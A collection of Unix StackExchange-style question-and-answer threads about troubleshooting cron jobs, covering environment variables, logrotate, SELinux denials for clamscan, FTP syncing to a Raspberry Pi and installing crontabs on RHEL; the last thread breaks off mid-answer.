glib.GError: Error spawning command line 'dbus-launch --autolaunch=970be6bbf9ff49009918057c308cf56e --binary-syntax --close-stderr': Child process exited with code 1
I know the DISPLAY is :0, through the command
echo $DISPLAY
therefore, I test the gnome-screensaver-command with it.
* * * * * export DISPLAY=:0 && /usr/bin/gnome-screensaver-command --lock 2>/home/li/screenerror
Unfortunately, it did not work, and the output is
** Message: Failed to get session bus: Error spawning command line 'dbus-launch --autolaunch=970be6bbf9ff49009918057c308cf56e --binary-syntax --close-stderr': Child process exited with code 1
I thought it was a problem with DISPLAY, but the variable DISPLAY is correct. Could you tell me what is going on?
|
I find the answer from here.
Update Pidgin IM status on Ubuntu using cron
cron runs in its own environment; therefore, we have to find the variables DBUS_SESSION_BUS_ADDRESS, XAUTHORITY, and DISPLAY. I followed the instructions and succeeded in setting the variables.
My script can work now!
| dbus-launch failed because the child process exited |
1,369,877,415,000 |
So, I am having some trouble with my cron setup - I am assuming it is a mistake I have made as this is the first time I have set it up. I have two jobs I have setup in cron, one to run at 1am the other at 2am, daily. This is my /etc/crontab:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
0 1 * * * root /usr/local/mysql/bin/mysqldump -usomeuser -psomepassword --opt zabbix > "/backups/zabbix_mysqldb.sql_$(date +%F_%R)"
0 2 * * * root /usr/bin/sh /zabbix_scripts/mysql_backup_script/zabbix-mysql-dump -p somepassword -o /backups
Here is what I am seeing in /var/log/cron:
Feb 7 01:00:01 adlmonitor01 CROND[17334]: (root) CMD (/usr/local/mysql/bin/mysqldump -usomeuser -psomepassword --opt zabbix > "/backups/zabbix_mysqldb.sql_$(date +)
Feb 7 01:01:01 adlmonitor01 CROND[17539]: (root) CMD (run-parts /etc/cron.hourly)
Feb 7 01:01:01 adlmonitor01 run-parts(/etc/cron.hourly)[17539]: starting 0anacron
Feb 7 01:01:01 adlmonitor01 anacron[17548]: Anacron started on 2017-02-07
Feb 7 01:01:01 adlmonitor01 anacron[17548]: Normal exit (0 jobs run)
Feb 7 01:01:01 adlmonitor01 run-parts(/etc/cron.hourly)[17550]: finished 0anacron
Feb 7 02:00:01 adlmonitor01 CROND[28788]: (root) CMD (/usr/bin/sh /zabbix_scripts/mysql_backup_script/zabbix-mysql-dump -p somepassword -o /backups)
Feb 7 02:01:01 adlmonitor01 CROND[28992]: (root) CMD (run-parts /etc/cron.hourly)
Feb 7 02:01:01 adlmonitor01 run-parts(/etc/cron.hourly)[28992]: starting 0anacron
Feb 7 02:01:01 adlmonitor01 anacron[29001]: Anacron started on 2017-02-07
Feb 7 02:01:01 adlmonitor01 anacron[29001]: Normal exit (0 jobs run)
Feb 7 02:01:01 adlmonitor01 run-parts(/etc/cron.hourly)[29003]: finished 0anacron
My guess is a syntax mistake I have made, but I can't seem to figure out where. Could someone shed some light?
|
Try replacing the long command invocation and redirected output that you are trying to invoke with a script that does the same thing, e.g. put the line
/usr/local/mysql/bin/mysqldump -usomeuser -psomepassword --opt zabbix > "/backups/zabbix_mysqldb.sql_$(date +%F_%R)"
into a script file, say /root/mytestscript, make it executable, and invoke it in cron as
0 1 * * * root /root/mytestscript > /root/mytestscript.log 2> /root/mytestscript.err
...or, even better, include the output and error logging within the body of mytestscript itself, which allows you to do
0 1 * * * root /root/mytestscript
You'll probably find that cron is swallowing stdout and stderr (or, as in classic cron, attempting to mail you the output). One of the above two invocation methods will ensure you see all the logs in predictable places.
Finally, FYI, it's not secure to put passwords in scripts, so all this is a temporary fix until you solve that problem. Try https://stackoverflow.com/questions/6861355/mysqldump-launched-by-cron-and-password-security/6861458#6861458 for help there.
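As a sketch, /root/mytestscript could look like this (credentials and paths copied from the question). Moving the command into a script also sidesteps crontab's special treatment of %, which crontab(5) turns into a newline unless escaped — consistent with the logged command being cut off right at `date +`:

```shell
#!/bin/sh
# /root/mytestscript — wrap the dump so cron runs a simple command
# and the logs land in predictable files.
exec >> /root/mytestscript.log 2>> /root/mytestscript.err

/usr/local/mysql/bin/mysqldump -usomeuser -psomepassword --opt zabbix \
    > "/backups/zabbix_mysqldb.sql_$(date +%F_%R)"
```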
| Trouble with crontab CentOS 7 - not processing jobs |
1,369,877,415,000 |
Running a python script on raspbian every minute; here is the crontab line:
* * * * * /usr/bin/python3 /something/code.py >> /something/code.txt
However, code.txt shows me that it stops halfway through the code, i.e.:
Hello 1
Hello 2
When run manually, I get more hello's, no errors.
Things I've done:
Added: #!/usr/bin/python3 to top of script
chmod +x the script
used just python3 vs /usr/bin/python3
Ran a sample **** (echo hello world >> text.txt) and it works, but python doesn't work :(
Any idea why? Thanks!
|
Probably your script needs some environment variables that crontab doesn't set by default. Keep in mind that the crontab environment is very limited.
There are several approaches to set your environment variables in cron:
Set each variable you need in your script.
Export a more complete PATH than the default set by your crontab, either at the beginning of your script or before calling your script in the crontab entry.
Source your profile: . $HOME/.profile.
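For example, either of these crontab variants (adding 2&gt;&amp;1 also captures any Python traceback, which the original &gt;&gt; redirection discards — that may be why the output merely appears to stop halfway):

```shell
# Set the variables inline for this one job:
* * * * * PATH=/usr/local/bin:/usr/bin:/bin /usr/bin/python3 /something/code.py >> /something/code.txt 2>&1

# ...or source your profile first:
* * * * * . "$HOME/.profile"; /usr/bin/python3 /something/code.py >> /something/code.txt 2>&1
```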
| Crontab stops halfway |
1,369,877,415,000 |
I'm using a BeagleBone Black which runs Debian 8.6. I want to start a program after reboot. I tried crontab, but it didn't work.
@reboot sleep 60 && /home/debian/acspilot/start.sh
The program consists of a config.sh file and an acsp.py python script. Each works fine from the terminal. Here are the scripts:
start.sh:
#!/bin/sh
sudo su
cd home/debian/acs/
./config_pins.sh
python acsp.py
config_pins.sh :
#! /bin/bash
cd /sys/devices/platform/bone_capemgr
File=slots
if grep -q "Override Board Name,00A0,Override Manuf,univ-emmc" "$File";
then
cd
echo -e "\nHooray!! configuration available"
echo -e "\n UART 4 configuration p9.11 and p9.13"
sudo config-pin P9.11 uart
sudo config-pin -q P9.11
sudo config-pin P9.13 uart
sudo config-pin -q P9.13
echo -e "\n UART 1 configuration p9.26 and p9.24"
sudo config-pin P9.24 uart
sudo config-pin -q P9.24
sudo config-pin P9.26 uart
sudo config-pin -q P9.26
echo -e "\n UART 5 configuration p8.38 and p8.37"
sudo config-pin P8.38 uart
sudo config-pin -q P8.38
sudo config-pin P8.37 uart
sudo config-pin -q P8.37
echo -e "\n UART configuration end"
else
echo "Oops!!configuration is not available"
echo "Please check uEnv.txt file and only disable HDMI"
fi
acsp.py:
import Adafruit_BBIO.PWM as PWM
import Adafruit_BBIO.UART as UART
import serial
import time
# UART communication begins
UART.setup("UART1")
# pwm begins
PWM.start("P9_14", 5,50)
ser = serial.Serial(port = "/dev/ttyO1", baudrate=9600)
ser.close()
ser.open()
while ser.isOpen():
    for i in range(1,99):
        print i
        ser.write(str(i)+"%")
        PWM.set_duty_cycle("P9_14", i)
        time.sleep(5)
ser.close()
UART.cleanup()
PWM.stop("P9_14")
PWM.cleanup()
|
The script uses sudo (including a sudo su line), so if it is scheduled in a non-root user's crontab it cannot run unattended: cron has no terminal on which sudo could prompt for a password. Instead, you should first become root with
sudo su -
And then
crontab -e
as root user and add the task line
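For example, in root's crontab the entry might look like this (the log path is an assumption; logging the output makes boot-time failures much easier to diagnose). Note that once the job runs as root, the sudo calls inside the scripts become unnecessary:

```shell
# root's crontab: wait for the system to settle after boot, then run the
# start script and log everything it prints.
@reboot sleep 60 && /home/debian/acspilot/start.sh >> /var/log/acspilot.log 2>&1
```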
| Run shell script after reboot in beaglebone black |
1,369,877,415,000 |
I'm using a script which works standalone but is not working when run through a cron job.
qexma1@test:bin> head -n 10 test.sh
#!/bin/bash
declare -r PATH='/sbin:/bin:/usr/sbin:/usr/bin'
source $AEM_CONFIG/aem-wrap.conf
Cron Job :
qexma1@test:bin> crontab -l | grep aem-test.sh
01 15 * * * bin/test.sh -b ; touch bin/crontest.txt;
Flag :
qexma1@test:bin> ll bin/ | grep cron
-rw-r--r-- 1 qexma1 abc 0 Nov 11 15:01 crontest.txt
The flag file crontest.txt got created, but the script didn't get executed. Permissions are 0755.
|
The output on stderr (below) shows that the variable $AEM_CONFIG is not being set; that is why the job fails.
/global/appaem/aem/bin/aem-test.sh: line 5: /aem-wrap.conf: No such file or directory
To fix the issue, revise the script to source the relevant file that sets $AEM_CONFIG.
As you point out the variable is defined in .bashrc, see cron ignores variables defined in “.bashrc” and “.bash_profile”. You need to add a line such as source ~/.bashrc into your script. Example:
#!/bin/bash
declare -r PATH='/sbin:/bin:/usr/sbin:/usr/bin'
source ~/.bashrc
source $AEM_CONFIG/aem-wrap.conf
| Shell script is not working via cron job |
1,369,877,415,000 |
When my report scripts need to run can vary within the month, as the data is not available at a standard time; sometimes it's ready on the 8th, sometimes on the 10th, etc.
I have many reports to execute so it would be fantastic to use the cron file like so:
##### VARIABLES #####
DAY_TO_RUN=8
##### Monthly #####
## COGS REPORT
0 12 $DAY_TO_RUN * * cd "/home/skilbjo/app/aqtl/jobs/Costs" ; node cogs_model.js >/dev/null
Is it possible?
|
cron by its nature does not support variable timing. What you want is a third-party job scheduler. A well-known commercial one is called "Maestro", from the company formerly known as Tivoli (now part of IBM). Many open-source equivalents exist; a web search for those keywords will turn them up.
Once you are in job-scheduler land, you can make your data file a dependency of the job: when the job's start time comes and passes, the scheduler waits for the dependency to be satisfied before starting execution.
You can also implement a similar function yourself with a few simple shell scripts, depending on the nature of the job you want to run and how much time you want to invest in such an endeavor. After all, it is not rocket science material.
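A minimal sketch of the shell-script approach, reusing the command and DAY_TO_RUN value from the question: schedule the job daily (e.g. `0 12 * * * /home/skilbjo/bin/run-cogs.sh`, where the wrapper path is hypothetical) and let the script decide whether today is the day:

```shell
#!/bin/sh
# run-cogs.sh — runs every day from cron, but acts only on the chosen day.
DAY_TO_RUN=8    # edit this (or read it from a config file) when the data date moves

# %-d gives the day of month without a leading zero (GNU date).
[ "$(date +%-d)" -eq "$DAY_TO_RUN" ] || exit 0

cd /home/skilbjo/app/aqtl/jobs/Costs && node cogs_model.js > /dev/null
```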
| Crontab: variables in the date/time fields |
1,369,877,415,000 |
kenneth@ballotreport:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
* * * * * /usr/bin/pgrep -f /var/www/whatapp/send_messages_out_cron.sh > /dev/null 2> /dev/null || /var/www/whatapp/send_messages_out_cron.sh >> /tmp/testcronlog.log
The file /tmp/testcronlog.log is never created. The command runs perfectly when run in a terminal. I have no idea what the problem could be.
|
I can't find documentation to confirm or deny this, but remember that cron entries are not shell scripts.
I assume that the logical OR (||) is not being handled the way you expect.
Either add the logic that prevents multiple instances (which I believe is why you use pgrep) to the script itself, or create a wrapper script and schedule that in cron.
| My cron is not running, nothing is showing in /var/mail/<username> or in /var/log/syslog |
1,369,877,415,000 |
I succeeded in transferring all files from a folder via FTP from a remote server to a Raspberry Pi, but I would like to transfer only new ones. Below is the working script I have.
#!/bin/bash -vx
ftp -in IP_SERVER<<END_SCRIPT
quote USER rem_user
quote PASS rem_pass
bin
prompt:off
cd /path_to_server_files
lcd /path_to_local_files
mget *.mp3
bye
END_SCRIPT
I have a company that provides background music to other companies. My method was leaving a computer at each one playing 24/7, or with other specific cron jobs depending on the client, and the Raspberry Pi is a great way to do that instead of a computer. The method I have right now that is working is a cron job per folder. Each folder has a type of music. So I will be putting different music in the server from time to time, and the cron job will transfer those files once a week. It is set to transfer every mp3 file in that folder to the RPi. The thing is, it will transfer all the files there, including the ones that were already there. If I put there, for example, 150 music files, it will take a long time transferring those, not to mention if it is done with all the folders, since the RPi ARM is not that powerful. The solution would be not overwriting the files already there, just the new ones. Then after some time another cron job will delete all the files that are more than * days old.
I searched, but it seems ftp doesn't have an option like this yet. So I found the wget command, which allows transferring without overwriting, but I couldn't make it transfer multiple files. I have been trying to convert the script above to the wget command without success. Can someone with experience in this matter help out? It could be a problem with http also. Thanks in advance.
I have tried with wget command:
* * * * * wget -r -l1 -N -A.mp3 'ftp://serverUser:Password@serverIP/path_to_server_files' /var/www/rd/musica/teste/ftp11.log 2>&1
Errors:
ftp://serverUser:Password@serverIP/path_to_server_files: Bad Port Number
/var/www/rd/musica/teste: Scheme Missing
This is my attempt with rsync:
The rsyncd.conf: (I am not sure if all the credentials are right, so I'll put every file in here so it can be corrected.)
lock file = /var/run/rsync.lock
lock file = /var/log/rsyncd.log
pid file = /var/run/rsync.pid
[documents]
path = /var/www/rd/musica/teste
comment = The documents folder of localusername
uid = localusername
gid = localusername
read only = no
list = yes
auth users = serverusername
secrets file =/etc/rsync.secrets
hosts allow = serverIP/255.255.255.0
rsyncd.secrets
localuser:password
serveruser:password
command to run rsync:
rsync -rtv serverusername@serverIP::documents/path_to_server_files/*.mp3 /path_to_local_destination_folder
It returns these errors:
rsync: failed to connect to serverIP (serverIP): Connection refused (111)
rsync error: error in socket IO (code 10) at clientserver.c(122) [Receiver=3.0.9]
|
SOLUTION - I got this script to work. Thank you for all the support you gave. If I have enough time to keep working on this, I'll keep trying the other options and make them work as well.
#!/usr/bin/python
import os
from ftplib import FTP
local_path='/path_to_local_files/'
os.chdir(local_path)
ftp = FTP(host='server_name_or_IP',user='username', passwd='password')
ftp.cwd('/path_to_local_files/')
f_list = ftp.nlst()
for f in f_list:
    if not f.endswith("mp3"):
        continue
    new_f_name = local_path + f
    if os.path.exists(new_f_name):
        continue
    print("Copying remote file <{0}>to local file <{1}>".format(f,new_f_name))
    ftp.retrbinary('RETR '+ f, open(new_f_name,'wb').write)
you may need to install this in order for the script to work:
sudo apt-get install python-dev
| Transferring mp3 files from a remote server via cronjob to the RPi without overwriting |
1,369,877,415,000 |
I am trying to run a simple echo script via crontab. I set it to run every minute, but it doesn't give output on the shell screen. However, it runs fine when I run the script independently.
Script
#!/bin/bash
echo "Test Script"
Crontab entry:
root@example-server ~]# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * root /root/test.sh
|
The output of a cron job doesn't go to your screen. It can't — you might not even be logged in by the time the job runs!
The output of a cron job is sent via email. A working unix system always has a local email facility, which is independent of a network connection. If you want your local email to be sent to a remote account, create a .forward file in your home directory containing the remote email address. Some distributions don't set up local email by default, in which case cron output disappears in a black hole. You need a mail transfer agent to deliver local email. On an individual machine, configure it not to accept incoming connections from the network (most distributions have an easy way to set this up). Common MTAs include Exim and Postfix; if your distribution has a default MTA, just pick it.
| script running in crontab not giving output on shell screen |
1,369,877,415,000 |
When I look at the questions and answers on this forum, it seems like the threshold to ask a question is very high. At least for someone like me, with very little knowledge of Linux. Most of the questions about cron jobs are out of my league, including the answers. So with a little bit of embarrassment, I am going to ask the simplest questions.
I want to create a cron job that shows me the date/time every minute. I want to see this in real time, on the console. I am guessing that this will eventually be done through a bash script or Python, but for now, I want to use the command line.
crontab -e
* * * * * /bin/date >> /home/pi/cron_date
I understand the concept of the stars. I have used the "which" command to find where "date" is. I am redirecting this "date" information to a file which has not been created yet, but will be created when I hit the Enter key, called cron_date.
I am using the editor "nano".
Control + O is WriteOut (which I am guessing is save/save as).
File Name to Write: /tmp/crontab.D3AZm/crontab
Question 1:
I have used the Enter key and let "nano" call it what it wants to. My cron_date file is still created under /home/pi. I understand that the file name "nano" is giving me is for a temporary file. But since I already have decided that I want this file as my own file, should I delete the "nano" suggestion and substitute it with:
File Name to Write: /home/pi/cron_date
or am I wondering about things I really don't have to think about? For now, I have been letting this temp file be named by "nano" and not substituting anything.
crontab: installing new crontab
crontab -l
My file exists. The problem now is viewing the file realtime.
I can see the date/time with:
nano cron_date
cat /home/pi/cron_date
But I have to use the same commands to update the information. My only realtime view of this file is:
tail -f /home/pi/cron_date
Question 2:
Is there a way where I can see the whole file being updated?
This is just the beginning of a hobby project I want to do. Take pictures with a Raspberry Pi of the bottom of a river. I will be making an amateur ROV. If my Raspberry Pi with camera is submerged under water, I want to measure the temp combined with the time. If it overheats I will be able to see that and turn on a fan. I might be barking up the wrong tree, but my understanding of cron jobs is where my project starts.
Raspberry Pi 1 model B: Which uses Debian.
|
When you run the crontab -e command, it lets you edit a temporary file. When you exit the editor, the temporary file is checked for syntax errors, and if there aren't any, it's installed in the system directory that contains users' crontabs. If you save the file to a different location, then the temporary file will not be modified, and thus your previous crontab remains in place. Run the command crontab -l to check the content of your crontab.
Each cron job is executed in your home directory. This is completely independent of the location of the temporary file that you edit. If you want a job to be executed in a different directory, start it with the cd command, e.g.
* * * * * cd ~/subdir && date >>somefile
This changes to the directory subdir in your home directory (which must already exist), and the output of date will thus be written to /home/pi/subdir/somefile. If the cd command fails (e.g. because the directory doesn't exist), the date command won't be executed, thanks to the && operator.
You don't need to write the full path to date, because it's in the default command search path.
I'm not sure what you mean by “see the whole file being updated”. The command tail -f shows the last 10 lines of the file at the time it is executed, then keeps running forever (or until you kill it) and shows lines as they are added. If you want to show only newly-added lines (i.e. not show anything when tail starts), tell it to output 0 lines:
tail -n 0 -f /home/pi/cron_date
If you want to show the whole file, and then print new lines as they are added, tell tail to start at line 1.
tail -n +1 -f /home/pi/cron_date
| Creating a cron job and watching its output in real time |
1,369,877,415,000 |
I've created a custom clamscan (ClamAV) script in bash, and when I run it in my shell everything is fine, but when I run it from cron, it can't create the log file.
These are the errors:
/root/Scripts/clamscan : line 9: /var/log/clamscan/weekly/clamscan-Test-2014-09-16.log: No such file or directory
/bin/bash: /root/Scripts/clamscan: Permission denied
Also I get emails from cron: Null message body;hope that's ok
Before the "if it's ok mail" I get an empty email, with no message
If I run the script in a shell, it creates the log file no problem.
Questions:
What do I have to do with my bash script so it can write the appropriate files?
Why do I get these errors?
Here is the script:
#!/bin/bash
FILENAMEDATE=$(date +"%F")
/usr/bin/clamscan -i -r --log=/var/log/clamscan/weekly/clamscan-Test-$FILENAMEDATE.log /home/Username/Downloads >/dev/null 2>/dev/null
if [ $? -gt 0 ];
then
SUBJECT="Virus Report for `uname -n`, `date +%m-%d-%Y`"
mail -s "$SUBJECT" 'Email' < /var/log/clamscan/weekly/clamscan-Test-$FILENAMEDATE.log
fi
Here is /etc/crontab:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO="Email"
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
56 13 * * * root /bin/bash /root/Scripts/clamscan
|
I found the answer:
Note this system is Fedora 20.
SELinux was denying clamscan permission to write, create files, and more on the system.
So follow the directions in the SELinux troubleshooter to allow clamscan the access, and repeat for each reported denial. There was also a denial on mailx, but that didn't do anything visible to the process. It works!
Here are two of the SELinux denials:
SELinux is preventing /usr/bin/mailx from ioctl access on the file .
***** Plugin catchall (100. confidence) suggests **************************
If you believe that mailx should be allowed ioctl access on the file by default.
Then you should report this as a bug.
You can generate a local policy module to allow this access.
Do
allow this access for now by executing:
# grep mail /var/log/audit/audit.log | audit2allow -M mypol
# semodule -i mypol.pp
Additional Information:
Source Context system_u:system_r:system_mail_t:s0-s0:c0.c1023
Target Context system_u:object_r:user_home_t:s0
Target Objects [ file ]
Source mail
Source Path /usr/bin/mailx
Port <Unknown>
Host Hostname
Source RPM Packages mailx-12.5-10.fc20.x86_64
Target RPM Packages
Policy RPM selinux-policy-3.12.1-183.fc20.noarch
Selinux Enabled True
Policy Type targeted
Enforcing Mode Enforcing
Host Name Hostname
Platform Linux Hostname 3.16.2-200.fc20.x86_64 #1 SMP Mon
Sep 8 11:54:45 UTC 2014 x86_64 x86_64
Alert Count 1
First Seen 2014-09-16 17:42:37 GMT
Last Seen 2014-09-16 17:42:37 GMT
Local ID abc31a8e-345d-4d49-adf4-42cefab652a0
Raw Audit Messages
type=AVC msg=audit(1410889357.123:13483): avc: denied { ioctl } for pid=32125 comm="mail" path="PathToLogFile.log" dev="dm-3" ino=2760739 scontext=system_u:system_r:system_mail_t:s0-s0:c0.c1023 tcontext=system_u:object_r:user_home_t:s0 tclass=file permissive=0
type=SYSCALL msg=audit(1410889357.123:13483): arch=x86_64 syscall=ioctl success=no exit=EACCES a0=0 a1=5401 a2=7fff29623700 a3=8 items=0 ppid=32089 pid=32125 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=765 comm=mail exe=/usr/bin/mailx subj=system_u:system_r:system_mail_t:s0-s0:c0.c1023 key=(null)
Hash: mail,system_mail_t,user_home_t,file,ioctl
SELinux is preventing /usr/bin/clamscan from unlink access on the file .
***** Plugin catchall (100. confidence) suggests **************************
If you believe that clamscan should be allowed unlink access on the file by default.
Then you should report this as a bug.
You can generate a local policy module to allow this access.
Do
allow this access for now by executing:
# grep clamscan /var/log/audit/audit.log | audit2allow -M mypol
# semodule -i mypol.pp
Additional Information:
Source Context system_u:system_r:antivirus_t:s0-s0:c0.c1023
Target Context unconfined_u:object_r:user_home_t:s0
Target Objects [ file ]
Source clamscan
Source Path /usr/bin/clamscan
Port <Unknown>
Host Hostname
Source RPM Packages clamav-0.98.4-1.fc20.x86_64
Target RPM Packages
Policy RPM selinux-policy-3.12.1-183.fc20.noarch
Selinux Enabled True
Policy Type targeted
Enforcing Mode Enforcing
Host Name Hostname
Platform Linux Hostname 3.16.2-200.fc20.x86_64 #1 SMP Mon
Sep 8 11:54:45 UTC 2014 x86_64 x86_64
Alert Count 1
First Seen 2014-09-16 18:28:11 GMT
Last Seen 2014-09-16 18:28:11 GMT
Local ID 513c5c73-1ca8-4715-8b6a-458010ede5bf
Raw Audit Messages
type=AVC msg=audit(1410892091.713:13684): avc: denied { unlink } for pid=1305 comm="clamscan" name="eicar.com.txt" dev="dm-4" ino=10769 scontext=system_u:system_r:antivirus_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_home_t:s0 tclass=file permissive=0
type=SYSCALL msg=audit(1410892091.713:13684): arch=x86_64 syscall=unlink success=no exit=EACCES a0=21fecf0 a1=3aa5db9a10 a2=0 a3=3a7478742e6d6f63 items=0 ppid=1302 pid=1305 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=792 comm=clamscan exe=/usr/bin/clamscan subj=system_u:system_r:antivirus_t:s0-s0:c0.c1023 key=(null)
Hash: clamscan,antivirus_t,user_home_t,file,unlink
| How to make my bash script be able to create an log file for a clamscan running in cron? |
1,369,877,415,000 |
We have logrotate working on several CentOS servers. One new server has a slightly different setup, and for some reason logrotate does not work for the httpd service. When I start it manually, it does work as expected. I set this up last week, and it didn't run once in four days.
The file /etc/cron.daily/logrotate exists, so I guess the cron job should run daily.
Contents of /etc/logrotate.conf
# see "man logrotate" for details
# rotate log files weekly
weekly
# keep 4 weeks worth of backlogs
rotate 4
# create new (empty) log files after rotating old ones
create
# use date as a suffix of the rotated file
dateext
# uncomment this if you want your log files compressed
#compress
# RPM packages drop log rotation information into this directory
include /etc/logrotate.d
# no packages own wtmp and btmp -- we'll rotate them here
/var/log/wtmp {
monthly
create 0664 root utmp
minsize 1M
rotate 1
}
/var/log/btmp {
missingok
monthly
create 0600 root utmp
rotate 1
}
# system-specific logs may be also be configured here.
Contents of /etc/logrotate.d/httpd. I suppose these override the logrotate.conf settings.
/var/log/httpd/*log {
daily
compress
rotate 20
missingok
notifempty
sharedscripts
delaycompress
postrotate
/sbin/service httpd reload > /dev/null 2>/dev/null || true
endscript
}
Why doesn't it work?
|
The cron daemon was not running. After restarting it, cron worked, and logrotate started to work as well.
| Logrotate does not work for httpd service [closed] |
1,369,877,415,000 |
I have XML files to read and load into a database daily at night (via cron),
so I planned to do this in a batch.
Is there any command line tool to :
1. Create a postgres schema using an XSD file?
2. Transform an XML file into SQL commands for postgres?
Any other solution is welcome.
|
You can generate SQL commands to import your file using xmlstarlet.
Here is an example.
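A sketch of the transform step, assuming records shaped like `<book><title>…</title><price>…</price></book>` (the element, table, and column names are assumptions). xmlstarlet's `sel -t` template options build one INSERT per matched node:

```shell
# -m matches each record node, -v prints a child element's value,
# -o emits literal text, -n ends the line.
xmlstarlet sel -t -m '//book' \
    -o "INSERT INTO books (title, price) VALUES ('" \
    -v 'title' -o "', " -v 'price' -o ");" -n \
    books.xml > books.sql

# Note: this sketch does not escape single quotes inside values.
psql -d mydb -f books.sql
```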
| XML command line tool postgres |
1,369,877,415,000 |
In my PHP script, which runs as a cron job, I have
foreach($sites as $site)
{
exec('./wkhtmltoimage-amd64 ' . $site . ' somefile.png');
exec('./zopflipng -y somefile.png somefile.png');
}
to generate screenshots monthly for each site.
Now, this cron job runs once a month, and in the unlikely event that someone wanted to delete the image while this job ran, I'm not too sure what would happen. Would the image just not get deleted since it's in use? If that's the case, then how do I make it delete after it's no longer in use?
I've thought of a solution where I could just kill the process, but I am unsure of the outcome too. If I use
lsof -t somefile.png
that will give me the PID of the process. With that, I can kill the process within the delete function of the site using
exec('lsof -t somefile.png | kill -15');
After killing, will the original script near the top of this post still go on? Will the job be canceled? Does the cron job error out? I'd like for it to just be able to move on to the next site.
|
I think I would just test to see whether the file exists, and only run the optimizer on it if it does. You should be able to test for file existence quite easily from PHP. You could also do it from the shell (likely Bash or Bourne Shell) when you call exec().
exec('[ -f somefile.png ] && ./zopflipng -y somefile.png somefile.png');
Killing the exec
To address the other aspect of your question: if you're asking what happens when you kill one or both of the exec'd commands during one of the iterations of the for loop in your PHP program, the answer is that your for loop should soldier on and continue with the next iteration without any issues.
The exec'd commands are separate processes from your PHP script, so unless you exec them and do something with the status codes they return, the caller will be none the wiser that they either finished or were killed.
| kill process in script while writing file behavior |
1,369,877,415,000 |
I'm looking for an update manager for Debian Xfce. I installed Xfce on a computer which will be used by laypersons. Therefore, I want another (graphical) way to launch apt-get update && apt-get upgrade. But I don't want to slow the system by adding GNOME dependencies (update-manager-gnome is therefore not a solution).
The solution of configuring cron to launch commands such as 'apt-get update; apt-get upgrade -y --force-yes; apt-get dist-upgrade -y --force-yes;' seems too dangerous to me. I would like to offer a choice via a graphical interface.
|
Well, as jofel commented, there is unattended-upgrades to automate the upgrade process. There is also the update-manager-core package, which gives you access to the update-manager-text binary. Also, the normal package managers will do this quite nicely whenever you ask them (apt-get upgrade or aptitude full-upgrade).
This post also suggests that there's no update-manager GUI for XFCE (I don't use it myself), so you will either be working with unattended-upgrades or pull in update-manager-gnome, which as far as I can see doesn't have any GNOME dependency.
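For the unattended-upgrades route, enabling it on Debian is typically just the stock mechanism below (nothing XFCE-specific):

```shell
sudo apt-get install unattended-upgrades
# Writes the "enable" configuration after one yes/no prompt:
sudo dpkg-reconfigure -plow unattended-upgrades
```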
| Is there an update manager without gnome dependencies for xfce? |
1,369,877,415,000 |
I have a RHEL 6 server without any internet access that is missing a cron installation.
I am trying to install crontabs like this but I get this error:
[root@netsrvr01 cron.d]# rpm -ivh /Downloads/crontabs-1.10-33.el6.noarch.rpm
warning: /Downloads/crontabs-1.10-33.el6.noarch.rpm: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
error: Failed dependencies:
/etc/cron.d is needed by crontabs-1.10-33.el6.noarch
[root@netsrvr01 cron.d]#
What does "/etc/cron.d is needed" mean? I do have those directories and I am logged in as root. Unfortunately, I don't have a similar machine where I could use yumdownloader either.
RPM contents:
[root@netsrvr01 Downloads]# rpm -qpl /Downloads/crontabs-1.10-33.el6.noarch.rpm
warning: /Downloads/crontabs-1.10-33.el6.noarch.rpm: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/crontab
/usr/bin/run-parts
/usr/share/man/man4/crontabs.4.gz
|
Idea #1 - directory already exists
Try running the command rpm -Uvh --test /Downloads/crontabs-1.10-33.el6.noarch.rpm first to see if it reports anything out of the ordinary. If not then do an upgrade of this package instead of an install.
I believe it's complaining because this directory already exists, but it's unclear by whom. On my CentOS 6 boxes this directory shows as being owned by the package cronie.
$ rpm -qf /etc/cron.d
cronie-1.4.4-7.el6.x86_64
When I look at the contents of the crontabs package I see the following content:
$ repoquery -l crontabs
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/crontab
/usr/bin/run-parts
/usr/share/man/man4/crontabs.4.gz
